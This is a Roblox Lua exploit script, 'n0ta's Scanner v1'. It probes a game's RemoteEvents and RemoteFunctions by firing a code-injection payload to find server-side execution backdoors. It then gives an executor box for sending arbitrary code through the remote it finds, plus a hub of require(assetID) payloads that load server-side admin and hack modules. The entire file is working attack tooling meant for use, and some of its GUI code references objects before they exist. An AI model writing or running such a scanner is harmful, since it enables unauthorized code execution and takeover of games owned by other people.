local TweenService = game:GetService("TweenService")
local targetSize = UDim2.new(0.3, 0, 0.5, 0)
local tweenInfo = TweenInfo.new(0.4)


local HD = game:GetService("ReplicatedStorage"):FindFirstChild("HDAdminHDClient")
local chat = game['ReplicatedStorage']:FindFirstChild("DefaultChatSystemChatEvents")







function notify(title, msg)
    game:GetService("StarterGui"):SetCore("SendNotification", {
        Title = title,
        Text = msg,
        Duration = 5
    })
end



local gui = Instance.new("ScreenGui")
gui.Name = "patrickGui"
gui.Parent = game.CoreGui

local remote = nil

local ScanFrame = Instance.new("Frame")
ScanFrame.Size = UDim2.new(0.1, 0, 0.1, 0)
ScanFrame.Position = UDim2.new(0.3, 0, 0.3, 0)
ScanFrame.BackgroundColor3 = Color3.new(0,0,0)
ScanFrame.BorderColor3 = Color3.new(0, 0, 0)
ScanFrame.BorderSizePixel = 1
ScanFrame.Active = true
ScanFrame.BackgroundTransparency = 0 
ScanFrame.Draggable = true
ScanFrame.Parent = gui

local tween = TweenService:Create(ScanFrame, tweenInfo, {Size = targetSize})





local SFT1 = Instance.new("TextLabel")
SFT1.Size = UDim2.new(0.3, 0, 0.2, 0)
SFT1.Position = UDim2.new(0.1, 0, 0.02, 0)
SFT1.BackgroundColor3 = Color3.new(0, 0, 0)
SFT1.BorderColor3 = Color3.new(0, 0, 0)
SFT1.BorderSizePixel = 1
SFT1.Text = "n0ta's Scanner v1"
SFT1.BackgroundTransparency = 0 
SFT1.TextColor3 = Color3.new(255, 255, 255)
SFT1.Font = Enum.Font.Cartoon
SFT1.Parent = ScanFrame
SFT1.TextSize = 13



local ScanBT = Instance.new("TextButton")
ScanBT.Size = UDim2.new(0.4, 0, 0.2, 0)
ScanBT.Position = UDim2.new(0.3, 0, 0.4, 0)
ScanBT.BackgroundColor3 = Color3.new(1,1,1)
ScanBT.BorderColor3 = Color3.new(0, 0, 0)
ScanBT.BorderSizePixel = 1
ScanBT.Text = "Scan"
ScanBT.BackgroundTransparency = 0 
ScanBT.TextColor3 = Color3.new(0,0,0)
ScanBT.Font = Enum.Font.SourceSansBold
ScanBT.Parent = ScanFrame
ScanBT.TextSize = 17
ScanBT.MouseButton1Down:Connect(function()
  SAV()
end)

local SBC = Instance.new("UICorner")
SBC.CornerRadius = UDim.new(0, 5)
SBC.Parent = ScanBT


local gui = Instance.new("ScreenGui")
gui.Name = "patrickGui"
gui.Parent = game.CoreGui












local frame = Instance.new("Frame")
frame.Size = UDim2.new(0.3, 0, 0.5, 0)
frame.Position = UDim2.new(0.3, 0, 0.3, 0)
frame.BackgroundColor3 = Color3.new(0,0,0)
frame.BorderColor3 = Color3.new(0, 0, 0)
frame.BorderSizePixel = 1
frame.Active = true
frame.BackgroundTransparency = 0 
frame.Draggable = true
frame.Parent = gui
frame.Visible = false

local no = Instance.new("TextLabel")
no.Size = UDim2.new(1.0, 0, 0.1, 0)
no.Position = UDim2.new(0.0, 0, 0.0, 0)
no.BackgroundColor3 = Color3.new(1, 0, 0)
no.BorderColor3 = Color3.new(0, 0, 0)
no.BorderSizePixel = 1
no.Text = "n0ta's scanner"
no.BackgroundTransparency = 1
no.TextColor3 = Color3.new(1, 1, 1)
no.Font = Enum.Font.SourceSansBold
no.Parent = frame
no.TextScaled = true

local sf = Instance.new("ScrollingFrame")
sf.Size = UDim2.new(0.94, 0, 0.70, 0)
sf.Position = UDim2.new(0.03, 0, 0.12, 0)
sf.BackgroundColor3 = Color3.fromRGB(13,13,13)
sf.BorderColor3 = Color3.new(0, 0, 0)
sf.BorderSizePixel = 1
sf.Parent = frame


sf.BackgroundTransparency = 0 

local box = Instance.new("TextBox")
box.Size = UDim2.new(0.94, 0, 0.70, 0)
box.Position = UDim2.new(0.00, 0, 0.0, 0)
box.BackgroundColor3 = Color3.fromRGB(13,13,13)
box.BorderColor3 = Color3.new(0, 0, 0)
box.BorderSizePixel = 1
box.PlaceholderText = "hi"
box.TextColor3 = Color3.new(255,255,255)
box.BackgroundTransparency = 0
box.Font = Enum.Font.Code
box.TextSize = 15
box.Parent = sf
box.TextXAlignment = "Left"
box.TextYAlignment = "Top"
box.ClearTextOnFocus = false

local run = Instance.new("TextButton")
run.Size = UDim2.new(0.2, 0, 0.14, 0)
run.Position = UDim2.new(0.0, 0, 0.82, 0)
run.BackgroundColor3 = Color3.fromRGB(33,33,33)
run.BorderColor3 = Color3.new(0, 0, 0)
run.BorderSizePixel = 1
run.Text = "Execute"
run.BackgroundTransparency = 0 
run.TextColor3 = Color3.new(255, 255, 255)
run.Font = Enum.Font.SourceSans
run.Parent = frame
run.TextSize = 20
run.MouseButton1Click:Connect(function()
    if remote:IsA("RemoteEvent") then
    remote:FireServer(box.Text)
    elseif remote:IsA("RemoteFunction") then
        remote:InvokeServer(box.Text)
    end


end)


local button1 = Instance.new("TextButton")
button1.Size = UDim2.new(0.2, 0, 0.14, 0)
button1.Position = UDim2.new(0.21, 0, 0.82, 0)
button1.BackgroundColor3 = Color3.fromRGB(33,33,33)
button1.BorderColor3 = Color3.new(0, 0, 0)
button1.BorderSizePixel = 1
button1.Text = "Clear"
button1.BackgroundTransparency = 0 
button1.TextColor3 = Color3.new(255, 255, 255)
button1.Font = Enum.Font.SourceSans
button1.Parent = frame
button1.TextSize = 20
button1.MouseButton1Click:Connect(function()
    box.Text = ""
end)


local uic2 = Instance.new("UICorner")
uic2.CornerRadius = UDim.new(0, 5)
uic2.Parent = button3


local button3 = Instance.new("TextButton")
button3.Size = UDim2.new(0.2, 0, 0.14, 0)
button3.Position = UDim2.new(0.42, 0, 0.82, 0)
button3.BackgroundColor3 = Color3.fromRGB(33,33,33)
button3.BorderColor3 = Color3.new(0, 0, 0)
button3.BorderSizePixel = 1
button3.Text = "Hide"
button3.BackgroundTransparency = 0
button3.TextColor3 = Color3.new(255, 255, 255)
button3.Font = Enum.Font.SourceSans
button3.Parent = frame
button3.TextSize = 20
button3.MouseButton1Click:Connect(function()
    local hidden = false
    if not hidden then
        box.TextTransparency = 1
        hidden = true
    elseif hidden then
        box.TextTransparency = 0
        hidden = false
    end
end)


local uic3 = Instance.new("UICorner")
uic3.CornerRadius = UDim.new(0, 5)
uic3.Parent = button3



local uic4 = Instance.new("UICorner")
uic4.CornerRadius = UDim.new(0, 5)
uic4.Parent = button1



local UIC = Instance.new("UICorner")
UIC.CornerRadius = UDim.new(0, 5)
UIC.Parent = frame


local uic1 = Instance.new("UICorner")
uic1.CornerRadius = UDim.new(0, 5)
uic1.Parent = run



local uicidk = Instance.new("UICorner")
uicidk.CornerRadius = UDim.new(0, 5)
uicidk.Parent = button4


local hubF = Instance.new("Frame")
hubF.Size = UDim2.new(0.5, 0, 0.99, 0)
hubF.Position = UDim2.new(1.1, 0, 0.01, 0)
hubF.BackgroundColor3 = Color3.new(0,0,0)
hubF.BorderColor3 = Color3.new(0, 0, 0)
hubF.BorderSizePixel = 1
hubF.Active = true
hubF.BackgroundTransparency = 0 
hubF.Draggable = false
hubF.Parent = frame
hubF.Visible = false

local button4 = Instance.new("TextButton")
button4.Size = UDim2.new(0.2, 0, 0.14, 0)
button4.Position = UDim2.new(0.77, 0, 0.82, 0)
button4.BackgroundColor3 = Color3.fromRGB(33,33,33)
button4.BorderColor3 = Color3.new(0, 0, 0)
button4.BorderSizePixel = 1
button4.Text = "Hub"
button4.BackgroundTransparency = 0
button4.TextColor3 = Color3.new(255, 255, 255)
button4.Font = Enum.Font.SourceSans
button4.Parent = frame
button4.TextSize = 20
button4.MouseButton1Click:Connect(function()
    hubF.Visible = not hubF.Visible
end)


local HSF = Instance.new("ScrollingFrame")
HSF.Size = UDim2.new(0.99, 0, 0.99, 0)
HSF.Position = UDim2.new(0.0, 0, 0.0, 0)
HSF.BackgroundColor3 = Color3.fromRGB(33,33,33)
HSF.BorderColor3 = Color3.new(0, 0, 0)
HSF.BorderSizePixel = 1
HSF.CanvasSize = UDim2.new(0, 0, 1.2, 0)
HSF.ScrollBarThickness = 6
HSF.Parent = hubF

local HB1 = Instance.new("TextButton")
HB1.Size = UDim2.new(0.99, 0, 0.1, 0)
HB1.Position = UDim2.new(0.0, 0, 0.00, 0)
HB1.BackgroundColor3 = Color3.new(1, 0, 0)
HB1.BorderColor3 = Color3.new(0, 0, 0)
HB1.BorderSizePixel = 1
HB1.Text = "IY SS"
HB1.BackgroundTransparency = 0 
HB1.TextColor3 = Color3.new(1, 1, 1)
HB1.Font = Enum.Font.SourceSans
HB1.TextSize = 20
HB1.Parent = HSF
HB1.MouseButton1Click:Connect(function()
    box.Text = "require(13716575182)('name')"
end)

local HB2 = Instance.new("TextButton")
HB2.Size = UDim2.new(0.99, 0, 0.1, 0)
HB2.Position = UDim2.new(0.0, 0, 0.11, 0)
HB2.BackgroundColor3 = Color3.new(1, 0, 0)
HB2.BorderColor3 = Color3.new(0, 0, 0)
HB2.BorderSizePixel = 1
HB2.Text = "HD Rank"
HB2.BackgroundTransparency = 0 
HB2.TextColor3 = Color3.new(1, 1, 1)
HB2.Font = Enum.Font.SourceSans
HB2.TextSize = 20
HB2.Parent = HSF
HB2.MouseButton1Click:Connect(function()
        box.Text = "require(7192763922).load('name')"
end)

local HB3 = Instance.new("TextButton")
HB3.Size = UDim2.new(0.99, 0, 0.1, 0)
HB3.Position = UDim2.new(0.0, 0, 0.22, 0)
HB3.BackgroundColor3 = Color3.new(1, 0, 0)
HB3.BorderColor3 = Color3.new(0, 0, 0)
HB3.BorderSizePixel = 1
HB3.Text = "Sensation"
HB3.BackgroundTransparency = 0 
HB3.TextColor3 = Color3.new(1, 1, 1)
HB3.Font = Enum.Font.SourceSans
HB3.TextSize = 20
HB3.Parent = HSF
HB3.MouseButton1Click:Connect(function()
    box.Text = "require(100263845596551)('name')"
end)

local HB4 = Instance.new("TextButton")
HB4.Size = UDim2.new(0.99, 0, 0.1, 0)
HB4.Position = UDim2.new(0.0, 0, 0.33, 0)
HB4.BackgroundColor3 = Color3.new(1, 0, 0)
HB4.BorderColor3 = Color3.new(0, 0, 0)
HB4.BorderSizePixel = 1
HB4.Text = "Exser"
HB4.BackgroundTransparency = 0 
HB4.TextColor3 = Color3.new(1, 1, 1)
HB4.Font = Enum.Font.SourceSans
HB4.TextSize = 20
HB4.Parent = HSF
HB4.MouseButton1Click:Connect(function()
    box.Text = "require(13716575182):pls('name')"
end)

local HB5 = Instance.new("TextButton")
HB5.Size = UDim2.new(0.99, 0, 0.1, 0)
HB5.Position = UDim2.new(0.0, 0, 0.44, 0)
HB5.BackgroundColor3 = Color3.new(1, 0, 0)
HB5.BorderColor3 = Color3.new(0, 0, 0)
HB5.BorderSizePixel = 1
HB5.Text = "Button 5"
HB5.BackgroundTransparency = 0 
HB5.TextColor3 = Color3.new(1, 1, 1)
HB5.Font = Enum.Font.SourceSans
HB5.TextSize = 20
HB5.Parent = HSF



local rrs = game:GetService("RobloxReplicatedStorage")
local rs = game:GetService("ReplicatedStorage")
local js = game:GetService("JointsService")


local scanning = false
local gotremote = nil
local rTable = {}
local bdinstance = nil

function SAV()
	local rem = nil
	if not scanning then
		scanning = true
		gotremote = nil
		rTable = {}

		notify("n0ta's scanner v1", "Scanning")

		local targets = {
			game:GetService("Lighting"),
			game:GetService("Workspace"),
			game:GetService("ReplicatedStorage")
		}

		for _, k in ipairs(targets) do
			for _, b in ipairs(k:GetDescendants()) do
				if b:IsA("RemoteEvent") or b:IsA("RemoteFunction") then
				if b.Parent ~= chat and b.Parent ~= game["ReplicatedStorage"]:FindFirstChildWhichIsA("Folder") then
					table.insert(rTable, b)
				end
				end
			end
		end

		for _, v in pairs(rTable) do
			if gotremote == nil then
				local nwh = string.char(
					0x0041, 0x0042, 0x0043, 0x0044, 0x0045, 0x0046, 0x0047, 0x0048,
					0x0049, 0x004A, 0x004B, 0x004C, 0x004D, 0x004E, 0x004F, 0x0050,
					0x0051, 0x0052, 0x0053, 0x0054, 0x0055, 0x0056, 0x0057, 0x0058,
					0x0059, 0x005A, 0x0041, 0x0042, 0x0043, 0x0044, 0x0045, 0x0046
				)

				local code = 'Instance.new("Model", workspace).Name="' .. nwh .. '"'
				rem = v

				if v:IsA("RemoteEvent") then
					v:FireServer(code)
				elseif v:IsA("RemoteFunction") then
					task.spawn(function()
						v:InvokeServer(code)
					end)
				end

				wait(0.6)
				if workspace:FindFirstChild(nwh) and workspace[nwh]:IsA("Model") then
					notify("n0ta's scanner", "Instance Exists")
					gotremote = v
				    remote = v
				end
			end
		end

		if gotremote ~= nil then
			notify("n0ta's scanner v1", "Success! Found Backdoor")
            frame.Visible = true
		else
			notify("n0ta's scanner", "No Backdoor Found")
		end

		scanning = false
	
	end
end







wait(1.7)
tween:Play()











